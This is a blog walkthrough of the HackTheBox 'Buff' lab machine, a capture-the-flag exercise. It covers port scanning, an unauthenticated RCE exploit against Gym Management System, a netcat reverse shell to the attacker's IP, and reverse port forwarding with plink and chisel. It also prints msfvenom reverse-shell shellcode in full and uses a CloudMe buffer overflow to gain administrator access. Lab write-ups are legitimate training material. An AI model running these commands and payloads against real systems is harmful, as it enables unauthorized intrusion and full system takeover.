This page looks best with JavaScript enabled

HackTheBox: Buff

 ·  ☕ 4 min read

Enumeration:

Started by enumerating ports:

root@osboxes:~# scan 10.10.10.198
[*] OS based on TTL
Windows
[*] TCP Scan
Open ports: 7680,8080
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
[*] Execution time:
	 TTL: 0
	 Furious: 132
	 Nmap: 71
	 Total: 203

Intrussion:

Manually enumerated the web until I got that is using Gym Management Software 1.0:
OpenEMR

Found a exploit for that particular CMS:

root@osboxes:~/Downloads# searchsploit gym
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                      |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                   | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                              | php/webapps/42801.txt
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@osboxes:~/Downloads# searchsploit -m 48506
  Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48506
     Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/Downloads/48506.py

Then used the exploit to get a reverse shell:

root@osboxes:~/Documents/Buff# python 48506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.15.193 443

To download the needed files use powershell Invoke-WebRequest "http://<YOUR-IP>:8000/FILE" -OutFile "C:\OUT_DIR\FILENAME"

Privesc:

After some enumeration found a weird file:

C:\Users\shaun\Downloads>ir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

30/07/2020  00:29    <DIR>          .
30/07/2020  00:29    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   6,235,152,384 bytes free

Made a research and found a BOF exploit

As the victim doesn’t have python let’s redirect the port that CloudMe uses to our host:

C:\xampp\htdocs\gym\upload>plink.exe -l root -pw root  -R 4444:127.0.0.1:8888 10.10.15.193
plink.exe -l root -pw root  -R 4444:127.0.0.1:8888 10.10.15.193
plink.exe -l root -pw root  -R 4444:127.0.0.1:8888 10.10.15.193
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 b1:bd:fd:b1:60:8a:6f:8a:02:11:f0:79:f5:3a:a2:af
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
y
Using username "root".
Linux osboxes 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 29 21:23:02 2020 from 10.10.10.198

Alternatively you could use chisel:

chisel server -p 3232 -reverse -v
SharpChisel.exe client 10.10.15.193:3232 R:127.0.0.1:4444:127.0.0.1:8888

Then created our own shell code payload using msfvenom:

root@osboxes:~/Downloads# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.193 LPORT=5555 -a x86 -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf =  b""
buf += b"\xdb\xcc\xd9\x74\x24\xf4\xba\x46\xc9\x1f\xe1\x5b\x29"
buf += b"\xc9\xb1\x52\x31\x53\x17\x03\x53\x17\x83\xad\x35\xfd"
buf += b"\x14\xcd\x2e\x80\xd7\x2d\xaf\xe5\x5e\xc8\x9e\x25\x04"
buf += b"\x99\xb1\x95\x4e\xcf\x3d\x5d\x02\xfb\xb6\x13\x8b\x0c"
buf += b"\x7e\x99\xed\x23\x7f\xb2\xce\x22\x03\xc9\x02\x84\x3a"
buf += b"\x02\x57\xc5\x7b\x7f\x9a\x97\xd4\x0b\x09\x07\x50\x41"
buf += b"\x92\xac\x2a\x47\x92\x51\xfa\x66\xb3\xc4\x70\x31\x13"
buf += b"\xe7\x55\x49\x1a\xff\xba\x74\xd4\x74\x08\x02\xe7\x5c"
buf += b"\x40\xeb\x44\xa1\x6c\x1e\x94\xe6\x4b\xc1\xe3\x1e\xa8"
buf += b"\x7c\xf4\xe5\xd2\x5a\x71\xfd\x75\x28\x21\xd9\x84\xfd"
buf += b"\xb4\xaa\x8b\x4a\xb2\xf4\x8f\x4d\x17\x8f\xb4\xc6\x96"
buf += b"\x5f\x3d\x9c\xbc\x7b\x65\x46\xdc\xda\xc3\x29\xe1\x3c"
buf += b"\xac\x96\x47\x37\x41\xc2\xf5\x1a\x0e\x27\x34\xa4\xce"
buf += b"\x2f\x4f\xd7\xfc\xf0\xfb\x7f\x4d\x78\x22\x78\xb2\x53"
buf += b"\x92\x16\x4d\x5c\xe3\x3f\x8a\x08\xb3\x57\x3b\x31\x58"
buf += b"\xa7\xc4\xe4\xcf\xf7\x6a\x57\xb0\xa7\xca\x07\x58\xad"
buf += b"\xc4\x78\x78\xce\x0e\x11\x13\x35\xd9\x14\xee\x3a\xd8"
buf += b"\x41\xec\x44\xcf\x22\x79\xa2\x85\x54\x2c\x7d\x32\xcc"
buf += b"\x75\xf5\xa3\x11\xa0\x70\xe3\x9a\x47\x85\xaa\x6a\x2d"
buf += b"\x95\x5b\x9b\x78\xc7\xca\xa4\x56\x6f\x90\x37\x3d\x6f"
buf += b"\xdf\x2b\xea\x38\x88\x9a\xe3\xac\x24\x84\x5d\xd2\xb4"
buf += b"\x50\xa5\x56\x63\xa1\x28\x57\xe6\x9d\x0e\x47\x3e\x1d"
buf += b"\x0b\x33\xee\x48\xc5\xed\x48\x23\xa7\x47\x03\x98\x61"
buf += b"\x0f\xd2\xd2\xb1\x49\xdb\x3e\x44\xb5\x6a\x97\x11\xca"
buf += b"\x43\x7f\x96\xb3\xb9\x1f\x59\x6e\x7a\x2f\x10\x32\x2b"
buf += b"\xb8\xfd\xa7\x69\xa5\xfd\x12\xad\xd0\x7d\x96\x4e\x27"
buf += b"\x9d\xd3\x4b\x63\x19\x08\x26\xfc\xcc\x2e\x95\xfd\xc4"

Finally updated the exploit with it and created an opening connection with ncat:

root@osboxes:~# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.15.193] from (UNKNOWN) [10.10.10.198] 49842
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator
Share on
ITasahobby
WRITTEN BY
ITasahobby
InTernet lover

See Also

©2023, All Rights Reserved